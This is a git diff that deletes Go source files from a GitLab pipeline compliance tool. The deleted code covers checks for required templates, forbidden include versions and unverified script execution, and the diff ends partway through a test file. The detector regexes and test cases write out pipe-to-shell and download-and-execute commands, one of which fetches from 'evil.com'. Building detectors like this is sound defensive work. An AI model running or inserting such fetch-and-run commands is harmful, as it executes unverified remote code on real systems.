-type TemplateGroupStatus struct {
- GroupIndex int `json:"groupIndex"` // Which requirement group (0-based)
- RequiredOrigins []string `json:"requiredOrigins"` // Templates required in this group
- FoundOrigins []string `json:"foundOrigins"` // Templates found and not overridden
- MissingOrigins []string `json:"missingOrigins"` // Templates missing from this group
- OverriddenOrigins []string `json:"overriddenOrigins"` // Templates found but overridden with forbidden keywords
- IsFullySatisfied bool `json:"isFullySatisfied"` // All templates in group present (not missing)
-}
-
-// GitlabPipelineRequiredTemplatesMetrics holds metrics about required templates
-type GitlabPipelineRequiredTemplatesMetrics struct {
- TotalGroups uint `json:"totalGroups"` // Total number of requirement groups
- SatisfiedGroups uint `json:"satisfiedGroups"` // Number of fully satisfied groups
- AnySatisfiedGroup bool `json:"anySatisfiedGroup"` // True if at least one group satisfied
- CiInvalid uint `json:"ciInvalid"`
- CiMissing uint `json:"ciMissing"`
-}
-
-// GitlabPipelineRequiredTemplatesResult holds the result of the required templates control
-type GitlabPipelineRequiredTemplatesResult struct {
- RequirementGroups []TemplateGroupStatus `json:"requirementGroups"`
- Issues []RequiredTemplateIssue `json:"issues"`
- OverriddenIssues []RequiredTemplateOverriddenIssue `json:"overriddenIssues"`
- Metrics GitlabPipelineRequiredTemplatesMetrics `json:"metrics"`
- Compliance float64 `json:"compliance"`
- Version string `json:"version"`
- CiValid bool `json:"ciValid"`
- CiMissing bool `json:"ciMissing"`
- Skipped bool `json:"skipped"`
- Error string `json:"error,omitempty"`
-}
-
-////////////////////
-// Control issues //
-////////////////////
-
-// RequiredTemplateIssue represents an issue with a missing required template
-type RequiredTemplateIssue struct {
- Code ErrorCode `json:"code"`
- DocURL string `json:"docUrl"`
- TemplatePath string `json:"templatePath"`
- GroupIndex int `json:"groupIndex"`
-}
-
-// RequiredTemplateOverriddenIssue represents an issue where a required template
-// is imported but its jobs are overridden with forbidden keywords
-type RequiredTemplateOverriddenIssue struct {
- Code ErrorCode `json:"code"`
- DocURL string `json:"docUrl"`
- TemplatePath string `json:"templatePath"`
- GroupIndex int `json:"groupIndex"`
- OverriddenJobs []utils.OverriddenJobDetail `json:"overriddenJobs"`
-}
-
-///////////////////////
-// Control functions //
-///////////////////////
-
-// pathsMatch checks if two paths match (direct or normalized)
-func pathsMatch(path1, path2 string) bool {
- if path1 == path2 {
- return true
- }
- return path.Clean(path1) == path.Clean(path2)
-}
-
-
-// templateMatchesRequired checks if a found template path matches a required template path
-func templateMatchesRequired(foundPath, requiredPath string) bool {
- if pathsMatch(foundPath, requiredPath) {
- return true
- }
- if strings.HasSuffix(foundPath, "/"+requiredPath) || strings.HasSuffix(foundPath, requiredPath) {
- return true
- }
- return false
-}
-
-// Run executes the required templates control
-func (p *GitlabPipelineRequiredTemplatesConf) Run(pipelineOriginData *collector.GitlabPipelineOriginData) *GitlabPipelineRequiredTemplatesResult {
- l := l.WithFields(logrus.Fields{
- "control": "GitlabPipelineRequiredTemplates",
- "controlVersion": ControlTypeGitlabPipelineOriginRequiredTemplatesVersion,
- })
- l.Info("Start required templates control")
-
- result := &GitlabPipelineRequiredTemplatesResult{
- RequirementGroups: []TemplateGroupStatus{},
- Issues: []RequiredTemplateIssue{},
- OverriddenIssues: []RequiredTemplateOverriddenIssue{},
- Metrics: GitlabPipelineRequiredTemplatesMetrics{},
- Compliance: 0.0,
- Version: ControlTypeGitlabPipelineOriginRequiredTemplatesVersion,
- CiValid: pipelineOriginData.CiValid,
- CiMissing: pipelineOriginData.CiMissing,
- Skipped: false,
- }
-
- if !p.Enabled {
- l.Info("Required templates control is disabled, skipping")
- result.Skipped = true
- result.Compliance = 100.0
- return result
- }
-
- // Initialize metrics
- metrics := GitlabPipelineRequiredTemplatesMetrics{}
-
- if !pipelineOriginData.CiValid {
- metrics.CiInvalid = 1
- }
- if pipelineOriginData.CiMissing {
- metrics.CiMissing = 1
- }
-
- // Initialize requirement groups
- result.RequirementGroups = make([]TemplateGroupStatus, len(p.RequiredGroups))
- for i, group := range p.RequiredGroups {
- result.RequirementGroups[i] = TemplateGroupStatus{
- GroupIndex: i,
- RequiredOrigins: group,
- FoundOrigins: []string{},
- MissingOrigins: make([]string, len(group)),
- OverriddenOrigins: []string{},
- IsFullySatisfied: false,
- }
- // Initialize all as missing
- copy(result.RequirementGroups[i].MissingOrigins, group)
- }
-
- // Check all origins against all requirement groups
- for idx := range pipelineOriginData.Origins {
- origin := &pipelineOriginData.Origins[idx]
-
- // Skip hardcoded origins
- if origin.OriginType == originHardcoded {
- continue
- }
-
- // Determine the template path from the origin
- var templatePaths []string
- if origin.FromPlumber && origin.PlumberOrigin.Path != "" {
- templatePaths = append(templatePaths, origin.PlumberOrigin.Path)
- }
- if origin.OriginType == "project" && origin.GitlabIncludeOrigin.Location != "" {
- templatePath := origin.GitlabIncludeOrigin.Location
- templatePath = strings.TrimSuffix(templatePath, ".yml")
- templatePath = strings.TrimSuffix(templatePath, ".yaml")
- templatePaths = append(templatePaths, templatePath)
- }
-
- if len(templatePaths) == 0 {
- continue
- }
-
- for groupIdx := range result.RequirementGroups {
- group := &result.RequirementGroups[groupIdx]
-
- for _, requiredOrigin := range group.RequiredOrigins {
- matched := false
- for _, foundPath := range templatePaths {
- if templateMatchesRequired(foundPath, requiredOrigin) {
- matched = true
- break
- }
- }
-
- if matched {
- overriddenJobs := getOriginOverriddenJobs(origin, pipelineOriginData)
-
- if len(overriddenJobs) > 0 {
- group.OverriddenOrigins = append(group.OverriddenOrigins, requiredOrigin)
- result.OverriddenIssues = append(result.OverriddenIssues, RequiredTemplateOverriddenIssue{ Code: CodeTemplateOverridden,
- DocURL: CodeTemplateOverridden.DocURL(), TemplatePath: requiredOrigin,
- GroupIndex: groupIdx,
- OverriddenJobs: overriddenJobs,
- })
- } else {
- group.FoundOrigins = append(group.FoundOrigins, requiredOrigin)
- }
-
- // Remove from missing list regardless of override status
- removeMissingTemplate(group, requiredOrigin)
-
- l.WithFields(logrus.Fields{
- "template": requiredOrigin,
- "groupIndex": groupIdx,
- "overriddenJobs": overriddenJobs,
- }).Debug("Required template matched")
-
- break
- }
- }
- }
- }
-
- // Evaluate groups, populate issues
- anySatisfied := false
- for i := range result.RequirementGroups {
- group := &result.RequirementGroups[i]
-
- // Group is fully satisfied if no templates are missing.
- // Overridden templates are still "present" (imported) β they produce separate issues.
- group.IsFullySatisfied = len(group.MissingOrigins) == 0
-
- if group.IsFullySatisfied {
- anySatisfied = true
- metrics.SatisfiedGroups++
- }
-
- // Create issues for missing templates
- for _, missing := range group.MissingOrigins {
- result.Issues = append(result.Issues, RequiredTemplateIssue{
- Code: CodeTemplateMissing,
- DocURL: CodeTemplateMissing.DocURL(),
- TemplatePath: missing,
- GroupIndex: i,
- })
- }
- // Note: overridden issues are created inline during origin matching
- // so we can capture the specific forbidden keys per template
- }
-
- // Calculate metrics
- metrics.TotalGroups = uint(len(p.RequiredGroups))
- metrics.AnySatisfiedGroup = anySatisfied
-
- // Calculate compliance using DNF logic
- // Found = 100%, Overridden = 50%, Missing = 0%
- if len(p.RequiredGroups) == 0 {
- result.Compliance = 100.0
- } else {
- maxScore := 0.0
- for _, group := range result.RequirementGroups {
- totalRequired := len(group.RequiredOrigins)
- if totalRequired == 0 {
- continue
- }
-
- found := len(group.FoundOrigins)
- overridden := len(group.OverriddenOrigins)
-
- score := (float64(found) + float64(overridden)*0.5) / float64(totalRequired)
- if score > maxScore {
- maxScore = score
- }
- }
- result.Compliance = maxScore * 100.0
- }
-
- result.Metrics = metrics
-
- l.WithFields(logrus.Fields{
- "totalGroups": metrics.TotalGroups,
- "satisfiedGroups": metrics.SatisfiedGroups,
- "compliance": result.Compliance,
- "missingIssues": len(result.Issues),
- "overriddenIssues": len(result.OverriddenIssues),
- }).Info("Required templates control completed")
-
- return result
-}
-
-// removeMissingTemplate removes a template from the missing list by path
-func removeMissingTemplate(group *TemplateGroupStatus, templatePath string) {
- for i := 0; i < len(group.MissingOrigins); i++ {
- if pathsMatch(group.MissingOrigins[i], templatePath) {
- group.MissingOrigins = append(group.MissingOrigins[:i], group.MissingOrigins[i+1:]...)
- return
- }
- }
-}
diff --git a/control/controlGitlabPipelineOriginVersion.go b/control/controlGitlabPipelineOriginVersion.go
deleted file mode 100644
index d465bef..0000000
--- a/control/controlGitlabPipelineOriginVersion.go
+++ /dev/null
@@ -1,252 +0,0 @@
-package control
-
-import (
- "strings"
-
- "github.com/getplumber/plumber/collector"
- "github.com/getplumber/plumber/configuration"
- "github.com/getplumber/plumber/gitlab"
- "github.com/sirupsen/logrus"
-)
-
-const ControlTypeGitlabPipelineOriginVersionVersion = "0.1.0"
-
-// originHardcoded is the constant for hardcoded origin type
-const originHardcoded = "hardcoded"
-
-//////////////////
-// Control conf //
-//////////////////
-
-// GitlabPipelineIncludesForbiddenVersionConf holds the configuration for forbidden version detection
-type GitlabPipelineIncludesForbiddenVersionConf struct {
- // Enabled controls whether this check runs
- Enabled bool `json:"enabled"`
-
- // ForbiddenVersions is a list of version patterns considered forbidden (e.g., latest, main, HEAD)
- ForbiddenVersions []string `json:"forbiddenVersions"`
-
- // DefaultBranchIsForbiddenVersion when true, adds the project's default branch to forbidden versions
- DefaultBranchIsForbiddenVersion bool `json:"defaultBranchIsForbiddenVersion"`
-}
-
-// GetConf loads configuration from PlumberConfig
-func (p *GitlabPipelineIncludesForbiddenVersionConf) GetConf(plumberConfig *configuration.PlumberConfig) error {
- if plumberConfig == nil {
- p.Enabled = false
- return nil
- }
-
- versionConfig := plumberConfig.GetIncludesMustNotUseForbiddenVersionsConfig()
- if versionConfig == nil {
- p.Enabled = false
- return nil
- }
-
- p.Enabled = versionConfig.IsEnabled()
- p.ForbiddenVersions = versionConfig.ForbiddenVersions
- if versionConfig.DefaultBranchIsForbiddenVersion != nil {
- p.DefaultBranchIsForbiddenVersion = *versionConfig.DefaultBranchIsForbiddenVersion
- }
-
- l.WithFields(logrus.Fields{
- "enabled": p.Enabled,
- "forbiddenVersions": p.ForbiddenVersions,
- "defaultBranchIsForbiddenVersion": p.DefaultBranchIsForbiddenVersion,
- }).Debug("includesMustNotUseForbiddenVersions control configuration loaded from .plumber.yaml file")
-
- return nil
-}
-
-////////////////////////////
-// Control data & metrics //
-////////////////////////////
-
-// GitlabPipelineIncludesForbiddenVersionMetrics holds metrics about forbidden version usage
-type GitlabPipelineIncludesForbiddenVersionMetrics struct {
- Total uint `json:"total"`
- UsingForbiddenVersion uint `json:"usingForbiddenVersion"`
- UsingAuthorizedVersion uint `json:"usingAuthorizedVersion"`
-}
-
-// GitlabPipelineIncludesForbiddenVersionResult holds the result of the forbidden version control
-type GitlabPipelineIncludesForbiddenVersionResult struct {
- Issues []GitlabPipelineIncludesForbiddenVersionIssue `json:"issues"`
- Metrics GitlabPipelineIncludesForbiddenVersionMetrics `json:"metrics"`
- Compliance float64 `json:"compliance"`
- Version string `json:"version"`
- CiValid bool `json:"ciValid"`
- CiMissing bool `json:"ciMissing"`
- Skipped bool `json:"skipped"`
- Error string `json:"error,omitempty"`
-}
-
-////////////////////
-// Control issues //
-////////////////////
-
-// GitlabPipelineIncludesForbiddenVersionIssue represents an issue with a forbidden version
-// Issue data for mutable version usage - PolicyIssueTypeId = [11]
-type GitlabPipelineIncludesForbiddenVersionIssue struct {
- Code ErrorCode `json:"code"`
- DocURL string `json:"docUrl"`
- Version string `json:"version"`
- LatestVersion string `json:"latestVersion,omitempty"`
- PlumberOriginPath string `json:"plumberOriginPath,omitempty"`
- GitlabIncludeLocation string `json:"gitlabIncludeLocation"`
- GitlabIncludeType string `json:"gitlabIncludeType"`
- GitlabIncludeProject string `json:"gitlabIncludeProject,omitempty"`
- Nested bool `json:"nested"`
- ComponentName string `json:"componentName,omitempty"`
- PlumberTemplateName string `json:"plumberTemplateName,omitempty"`
- OriginHash uint64 `json:"originHash"`
-}
-
-///////////////////////
-// Control functions //
-///////////////////////
-
-// Run executes the forbidden version detection control
-func (p *GitlabPipelineIncludesForbiddenVersionConf) Run(pipelineOriginData *collector.GitlabPipelineOriginData, projectDefaultBranch string) *GitlabPipelineIncludesForbiddenVersionResult {
- l := l.WithFields(logrus.Fields{
- "control": "GitlabPipelineIncludesForbiddenVersion",
- "controlVersion": ControlTypeGitlabPipelineOriginVersionVersion,
- })
- l.Info("Start forbidden version control")
-
- result := &GitlabPipelineIncludesForbiddenVersionResult{
- Issues: []GitlabPipelineIncludesForbiddenVersionIssue{},
- Metrics: GitlabPipelineIncludesForbiddenVersionMetrics{},
- Compliance: 100.0, // Start with 100%, will be set to 0 if any forbidden version found
- Version: ControlTypeGitlabPipelineOriginVersionVersion,
- CiValid: pipelineOriginData.CiValid,
- CiMissing: pipelineOriginData.CiMissing,
- Skipped: false,
- }
-
- if !p.Enabled {
- l.Info("Forbidden version control is disabled, skipping")
- result.Skipped = true
- return result
- }
-
- metrics := GitlabPipelineIncludesForbiddenVersionMetrics{}
-
- ///////////////////////////////////////
- // Check for forbidden version usage //
- ///////////////////////////////////////
-
- // Check all origins found in the data collection
- for _, origin := range pipelineOriginData.Origins {
-
- // Skip hardcoded origins and origins without versions
- if origin.OriginType == originHardcoded || origin.Version == "" {
- continue
- }
-
- lOrigin := l.WithFields(logrus.Fields{
- "originType": origin.OriginType,
- "version": origin.Version,
- "location": origin.GitlabIncludeOrigin.Location,
- "fromPlumber": origin.FromPlumber,
- "fromGitlabCatalog": origin.FromGitlabCatalog,
- })
- lOrigin.Debug("Origin version control in progress")
-
- // Create a copy of forbidden versions to avoid modifying the original
- forbiddenVersions := make([]string, len(p.ForbiddenVersions))
- copy(forbiddenVersions, p.ForbiddenVersions)
-
- // Add default branch if configured and available
- // TODO: default branch is not detected for GitLab catalog components yet
- originDefaultBranch := ""
- if origin.FromPlumber {
- // For Plumber templates, get the default branch from template.Repo.DefaultBranch
- originDefaultBranch = origin.PlumberOrigin.RepoDefaultBranch
- } else {
- // Fallback to analyzed project default
- originDefaultBranch = projectDefaultBranch
- }
-
- if p.DefaultBranchIsForbiddenVersion && originDefaultBranch != "" {
- forbiddenVersions = append(forbiddenVersions, originDefaultBranch)
- }
-
- // Check if the version matches any forbidden version pattern
- isForbiddenVersion := gitlab.CheckItemMatchToPatterns(origin.Version, forbiddenVersions)
-
- if isForbiddenVersion {
- // Determine the appropriate latest version based on origin type
- latestVersion := ""
- plumberOriginPath := ""
- plumberTemplateName := ""
-
- if origin.FromPlumber {
- latestVersion = origin.PlumberOrigin.LatestVersion
- plumberOriginPath = origin.PlumberOrigin.Path
- plumberTemplateName = origin.PlumberOrigin.Path
- } else if origin.FromGitlabCatalog {
- latestVersion = origin.GitlabComponent.ComponentLatestVersion
- }
-
- // Extract template name from the path (just the last part after the last "/")
- templateName := plumberTemplateName
- if plumberTemplateName != "" && strings.Contains(plumberTemplateName, "/") {
- templateName = plumberTemplateName[strings.LastIndex(plumberTemplateName, "/")+1:]
- }
-
- // Extract component name from gitlabIncludeLocation if it's a component and componentName is empty
- componentName := origin.GitlabComponent.ComponentName
- if origin.GitlabIncludeOrigin.Type == "component" && componentName == "" && origin.GitlabIncludeOrigin.Location != "" {
- if strings.Contains(origin.GitlabIncludeOrigin.Location, "/") {
- componentName = origin.GitlabIncludeOrigin.Location[strings.LastIndex(origin.GitlabIncludeOrigin.Location, "/")+1:]
- }
- }
-
- // Create issue for forbidden version
- issue := GitlabPipelineIncludesForbiddenVersionIssue{
- Code: CodeIncludeForbiddenVersion,
- DocURL: CodeIncludeForbiddenVersion.DocURL(),
- Version: origin.Version,
- LatestVersion: latestVersion,
- PlumberOriginPath: plumberOriginPath,
- GitlabIncludeLocation: origin.GitlabIncludeOrigin.Location,
- GitlabIncludeType: origin.GitlabIncludeOrigin.Type,
- GitlabIncludeProject: origin.GitlabIncludeOrigin.Project,
- Nested: origin.Nested,
- ComponentName: componentName,
- PlumberTemplateName: templateName,
- OriginHash: origin.OriginHash,
- }
-
- result.Issues = append(result.Issues, issue)
- metrics.UsingForbiddenVersion++
-
- lOrigin.WithField("forbiddenVersions", forbiddenVersions).Info("Forbidden version detected")
- } else {
- // Update metrics for valid versions
- metrics.UsingAuthorizedVersion++
- }
- }
-
- // Calculate total metrics
- metrics.Total = metrics.UsingForbiddenVersion + metrics.UsingAuthorizedVersion
-
- // Set compliance: 0% if any forbidden version found, 100% otherwise
- if len(result.Issues) > 0 {
- result.Compliance = 0.0
- } else {
- result.Compliance = 100.0
- }
-
- // Update result with final metrics
- result.Metrics = metrics
-
- l.WithFields(logrus.Fields{
- "totalOrigins": metrics.Total,
- "forbiddenVersionOrigins": metrics.UsingForbiddenVersion,
- "compliance": result.Compliance,
- }).Info("Forbidden version control completed")
-
- return result
-}
diff --git a/control/controlGitlabPipelineUnverifiedScripts.go b/control/controlGitlabPipelineUnverifiedScripts.go
deleted file mode 100644
index 993269c..0000000
--- a/control/controlGitlabPipelineUnverifiedScripts.go
+++ /dev/null
@@ -1,284 +0,0 @@
-package control
-
-import (
- "fmt"
- "regexp"
- "strings"
-
- "github.com/getplumber/plumber/collector"
- "github.com/getplumber/plumber/configuration"
- "github.com/getplumber/plumber/gitlab"
- "github.com/sirupsen/logrus"
-)
-
-const ControlTypeGitlabPipelineUnverifiedScriptsVersion = "0.1.0"
-
-//////////////////
-// Control conf //
-//////////////////
-
-// GitlabPipelineUnverifiedScriptsConf holds the configuration for unverified script execution detection
-type GitlabPipelineUnverifiedScriptsConf struct {
- Enabled bool `json:"enabled"`
- TrustedUrls []string `json:"trustedUrls"`
-}
-
-// GetConf loads configuration from PlumberConfig
-func (p *GitlabPipelineUnverifiedScriptsConf) GetConf(plumberConfig *configuration.PlumberConfig) error {
- if plumberConfig == nil {
- p.Enabled = false
- return nil
- }
-
- cfg := plumberConfig.GetPipelineMustNotExecuteUnverifiedScriptsConfig()
- if cfg == nil {
- l.Debug("pipelineMustNotExecuteUnverifiedScripts control configuration is missing from .plumber.yaml file, skipping")
- p.Enabled = false
- return nil
- }
-
- if cfg.Enabled == nil {
- return fmt.Errorf("pipelineMustNotExecuteUnverifiedScripts.enabled field is required in .plumber.yaml config file")
- }
-
- p.Enabled = cfg.IsEnabled()
- p.TrustedUrls = cfg.TrustedUrls
-
- l.WithFields(logrus.Fields{
- "enabled": p.Enabled,
- "trustedUrls": len(p.TrustedUrls),
- }).Debug("pipelineMustNotExecuteUnverifiedScripts control configuration loaded from .plumber.yaml file")
-
- return nil
-}
-
-////////////////////////////
-// Control data & metrics //
-////////////////////////////
-
-// GitlabPipelineUnverifiedScriptsMetrics holds metrics about unverified script detection
-type GitlabPipelineUnverifiedScriptsMetrics struct {
- JobsChecked uint `json:"jobsChecked"`
- TotalScriptLinesChecked uint `json:"totalScriptLinesChecked"`
- UnverifiedScriptsFound uint `json:"unverifiedScriptsFound"`
-}
-
-// GitlabPipelineUnverifiedScriptsResult holds the result of the control
-type GitlabPipelineUnverifiedScriptsResult struct {
- Issues []GitlabPipelineUnverifiedScriptsIssue `json:"issues"`
- Metrics GitlabPipelineUnverifiedScriptsMetrics `json:"metrics"`
- Compliance float64 `json:"compliance"`
- Version string `json:"version"`
- CiValid bool `json:"ciValid"`
- CiMissing bool `json:"ciMissing"`
- Skipped bool `json:"skipped"`
- Error string `json:"error,omitempty"`
-}
-
-////////////////////
-// Control issues //
-////////////////////
-
-// GitlabPipelineUnverifiedScriptsIssue represents an unverified script execution found in a CI job
-type GitlabPipelineUnverifiedScriptsIssue struct {
- Code ErrorCode `json:"code"`
- DocURL string `json:"docUrl"`
- JobName string `json:"jobName"`
- ScriptLine string `json:"scriptLine"`
- ScriptBlock string `json:"scriptBlock"`
- PatternType string `json:"patternType"`
-}
-
-///////////////////////
-// Control functions //
-///////////////////////
-
-// Compiled regexes for detecting unverified script execution patterns.
-
-// pipeToShell: curl ... | bash, wget ... | sh, etc. (with optional sudo)
-var pipeToShellRe = regexp.MustCompile(
- `(?i)(curl|wget)\s+[^|]*\|\s*(sudo\s+)?(bash|sh|zsh|python[23]?|perl|ruby)\b`,
-)
-
-// downloadAndExec: curl -o file && bash file, wget -O file && sh file
-var downloadAndExecRe = regexp.MustCompile(
- `(?i)(curl|wget)\s+.*(-o|-O)\s+(\S+).*&&\s*(sudo\s+)?(bash|sh|source|\.)\s+`,
-)
-
-// downloadRedirectExec: curl ... > file.sh; sh file.sh
-var downloadRedirectExecRe = regexp.MustCompile(
- `(?i)(curl|wget)\s+.*>\s*(\S+\.sh)\s*[;&]+\s*(sudo\s+)?(bash|sh|source|\.)\s+`,
-)
-
-// checksumVerificationRe matches lines that include a checksum or signature
-// verification step between the download and execution. These lines show that
-// the user is verifying integrity before running the script.
-var checksumVerificationRe = regexp.MustCompile(
- `(?i)(sha256sum|sha512sum|sha1sum|md5sum|shasum|gpg\s+--verify|gpg2\s+--verify|cosign\s+verify)`,
-)
-
-var unverifiedScriptPatterns = []struct {
- re *regexp.Regexp
- patternType string
-}{
- {pipeToShellRe, "pipe-to-shell"},
- {downloadAndExecRe, "download-and-execute"},
- {downloadRedirectExecRe, "download-redirect-execute"},
-}
-
-// Run executes the unverified script execution detection control
-func (p *GitlabPipelineUnverifiedScriptsConf) Run(pipelineOriginData *collector.GitlabPipelineOriginData) *GitlabPipelineUnverifiedScriptsResult {
- l := l.WithFields(logrus.Fields{
- "control": "GitlabPipelineUnverifiedScripts",
- "controlVersion": ControlTypeGitlabPipelineUnverifiedScriptsVersion,
- })
- l.Info("Start unverified script execution detection control")
-
- result := &GitlabPipelineUnverifiedScriptsResult{
- Issues: []GitlabPipelineUnverifiedScriptsIssue{},
- Metrics: GitlabPipelineUnverifiedScriptsMetrics{},
- Compliance: 100.0,
- Version: ControlTypeGitlabPipelineUnverifiedScriptsVersion,
- CiValid: pipelineOriginData.CiValid,
- CiMissing: pipelineOriginData.CiMissing,
- Skipped: false,
- }
-
- if !p.Enabled {
- l.Info("Unverified script execution detection control is disabled, skipping")
- result.Skipped = true
- return result
- }
-
- mergedConf := pipelineOriginData.MergedConf
- if mergedConf == nil {
- l.Warn("Merged CI configuration not available, cannot check scripts")
- result.Compliance = 0
- result.Error = "merged CI configuration not available"
- return result
- }
-
- // Compile trusted URL patterns into regexes for matching
- trustedPatterns := compileTrustedURLPatterns(p.TrustedUrls)
-
- // Check global before_script and after_script
- p.scanForUnverifiedScripts(mergedConf.BeforeScript, "(global)", "before_script", trustedPatterns, result)
- p.scanForUnverifiedScripts(mergedConf.AfterScript, "(global)", "after_script", trustedPatterns, result)
-
- // Check per-job scripts
- for jobName, jobContent := range mergedConf.GitlabJobs {
- job, err := gitlab.ParseGitlabCIJob(jobContent)
- if err != nil {
- l.WithError(err).WithField("job", jobName).Debug("Unable to parse job, skipping")
- continue
- }
- if job == nil {
- continue
- }
-
- result.Metrics.JobsChecked++
-
- p.scanForUnverifiedScripts(job.Script, jobName, "script", trustedPatterns, result)
- p.scanForUnverifiedScripts(job.BeforeScript, jobName, "before_script", trustedPatterns, result)
- p.scanForUnverifiedScripts(job.AfterScript, jobName, "after_script", trustedPatterns, result)
- }
-
- if len(result.Issues) > 0 {
- result.Compliance = 0.0
- }
-
- l.WithFields(logrus.Fields{
- "compliance": result.Compliance,
- "issuesFound": len(result.Issues),
- "jobsChecked": result.Metrics.JobsChecked,
- "totalScriptLines": result.Metrics.TotalScriptLinesChecked,
- "unverifiedScriptsFound": result.Metrics.UnverifiedScriptsFound,
- }).Info("Unverified script execution detection control complete")
-
- return result
-}
-
-// scanForUnverifiedScripts checks a script block for unverified script execution patterns.
-func (p *GitlabPipelineUnverifiedScriptsConf) scanForUnverifiedScripts(
- scriptField interface{},
- jobName string,
- blockType string,
- trustedPatterns []*regexp.Regexp,
- result *GitlabPipelineUnverifiedScriptsResult,
-) {
- lines := gitlab.GetScriptLines(scriptField)
- for _, line := range lines {
- result.Metrics.TotalScriptLinesChecked++
-
- trimmed := strings.TrimSpace(line)
- if trimmed == "" || strings.HasPrefix(trimmed, "#") {
- continue
- }
-
- for _, pattern := range unverifiedScriptPatterns {
- if pattern.re.MatchString(trimmed) {
- if containsTrustedURL(trimmed, trustedPatterns) {
- continue
- }
- if checksumVerificationRe.MatchString(trimmed) {
- continue
- }
-
- result.Issues = append(result.Issues, GitlabPipelineUnverifiedScriptsIssue{
- Code: CodeUnverifiedScriptExecution,
- DocURL: CodeUnverifiedScriptExecution.DocURL(),
- JobName: jobName,
- ScriptLine: truncateScriptLine(trimmed, 200),
- ScriptBlock: blockType,
- PatternType: pattern.patternType,
- })
- result.Metrics.UnverifiedScriptsFound++
- break
- }
- }
- }
-}
-
-// compileTrustedURLPatterns converts trusted URL patterns into compiled regexes.
-// Each pattern is matched exactly unless it contains a wildcard (*), which
-// matches any sequence of characters. Patterns are anchored so that
-// "https://example.com" only matches that exact URL, not subpaths. Use
-// "https://example.com/*" to match all subpaths.
-func compileTrustedURLPatterns(trustedUrls []string) []*regexp.Regexp {
- var patterns []*regexp.Regexp
- for _, u := range trustedUrls {
- u = strings.TrimSpace(u)
- if u == "" {
- continue
- }
- escaped := regexp.QuoteMeta(u)
- // Convert \* (escaped wildcard) back to .* for glob-style matching
- regexStr := `(?:^|[\s"'])` + strings.ReplaceAll(escaped, `\*`, `.*`) + `(?:$|[\s"'])`
- re, err := regexp.Compile(regexStr)
- if err != nil {
- l.WithError(err).WithField("pattern", u).Warn("Invalid trusted URL pattern, skipping")
- continue
- }
- patterns = append(patterns, re)
- }
- return patterns
-}
-
-// containsTrustedURL checks whether the script line contains a URL that matches
-// any of the compiled trusted URL patterns.
-func containsTrustedURL(line string, trustedPatterns []*regexp.Regexp) bool {
- for _, re := range trustedPatterns {
- if re.MatchString(line) {
- return true
- }
- }
- return false
-}
-
-// truncateScriptLine truncates a script line to the given max length.
-func truncateScriptLine(s string, maxLen int) string {
- if len(s) <= maxLen {
- return s
- }
- return s[:maxLen-3] + "..."
-}
diff --git a/control/controlGitlabPipelineUnverifiedScripts_test.go b/control/controlGitlabPipelineUnverifiedScripts_test.go
deleted file mode 100644
index e964436..0000000
--- a/control/controlGitlabPipelineUnverifiedScripts_test.go
+++ /dev/null
@@ -1,378 +0,0 @@
-package control
-
-import (
- "testing"
-
- "github.com/getplumber/plumber/collector"
- "github.com/getplumber/plumber/gitlab"
-)
-
-func buildOriginDataWithScriptJobs(jobs map[string]interface{}) *collector.GitlabPipelineOriginData {
- mergedConf := &gitlab.GitlabCIConf{
- GitlabJobs: jobs,
- }
- return &collector.GitlabPipelineOriginData{
- MergedConf: mergedConf,
- CiValid: true,
- CiMissing: false,
- }
-}
-
-func TestUnverifiedScripts_Disabled(t *testing.T) {
- conf := &GitlabPipelineUnverifiedScriptsConf{Enabled: false}
- data := buildOriginDataWithScriptJobs(nil)
-
- result := conf.Run(data)
-
- if !result.Skipped {
- t.Fatal("expected control to be skipped when disabled")
- }
- if result.Compliance != 100.0 {
- t.Fatalf("expected compliance 100 when skipped, got %v", result.Compliance)
- }
-}
-
-func TestUnverifiedScripts_NilMergedConf(t *testing.T) {
- conf := &GitlabPipelineUnverifiedScriptsConf{Enabled: true}
- data := &collector.GitlabPipelineOriginData{
- MergedConf: nil,
- CiValid: true,
- CiMissing: false,
- }
-
- result := conf.Run(data)
-
- if result.Compliance != 0 {
- t.Fatalf("expected compliance 0 when merged conf unavailable, got %v", result.Compliance)
- }
- if result.Error == "" {
- t.Fatal("expected error message when merged conf unavailable")
- }
-}
-
-func TestUnverifiedScripts_NoJobs(t *testing.T) {
- conf := &GitlabPipelineUnverifiedScriptsConf{Enabled: true}
- data := buildOriginDataWithScriptJobs(map[string]interface{}{})
-
- result := conf.Run(data)
-
- if result.Compliance != 100.0 {
- t.Fatalf("expected compliance 100 with no jobs, got %v", result.Compliance)
- }
- if len(result.Issues) != 0 {
- t.Fatalf("expected 0 issues, got %d", len(result.Issues))
- }
-}
-
-// -- Direct pipe-to-shell patterns --
-
-func TestUnverifiedScripts_CurlPipeBash(t *testing.T) {
- conf := &GitlabPipelineUnverifiedScriptsConf{Enabled: true}
-
- tests := []struct {
- name string
- script string
- }{
- {"curl pipe bash", "curl -fsSL https://example.com/install.sh | bash"},
- {"curl pipe sh", "curl -sSL https://evil.com/script.sh | sh"},
- {"wget pipe bash", "wget -qO- https://example.com/install.sh | bash"},
- {"wget pipe sh", "wget -O - https://example.com/setup.sh | sh"},
- {"curl pipe sudo bash", "curl -fsSL https://get.docker.com | sudo bash"},
- {"curl pipe sudo sh", "curl https://example.com/install.sh | sudo sh"},
- {"curl pipe python", "curl https://example.com/script.py | python"},
- {"curl pipe python3", "curl https://example.com/script.py | python3"},
- {"wget pipe perl", "wget -O- https://example.com/setup.pl | perl"},
- {"curl pipe ruby", "curl -fsSL https://example.com/setup.rb | ruby"},
- {"curl pipe zsh", "curl -fsSL https://example.com/install.sh | zsh"},
- }
-
- for _, tt := range tests {
- t.Run(tt.name, func(t *testing.T) {
- jobContent := map[interface{}]interface{}{
- "script": []interface{}{tt.script},
- }
- data := buildOriginDataWithScriptJobs(map[string]interface{}{"install": jobContent})
- result := conf.Run(data)
- if len(result.Issues) != 1 {
- t.Fatalf("script %q should be flagged, expected 1 issue, got %d", tt.script, len(result.Issues))
- }
- if result.Issues[0].PatternType != "pipe-to-shell" {
- t.Fatalf("expected pattern type 'pipe-to-shell', got %q", result.Issues[0].PatternType)
- }
- if result.Compliance != 0.0 {
- t.Fatalf("expected compliance 0, got %v", result.Compliance)
- }
- })
- }
-}
-
-// -- Download-and-execute patterns --
-
-func TestUnverifiedScripts_DownloadAndExecute(t *testing.T) {
- conf := &GitlabPipelineUnverifiedScriptsConf{Enabled: true}
-
- tests := []struct {
- name string
- script string
- }{
- {"curl -o then bash", "curl -o install.sh https://example.com/install.sh && bash install.sh"},
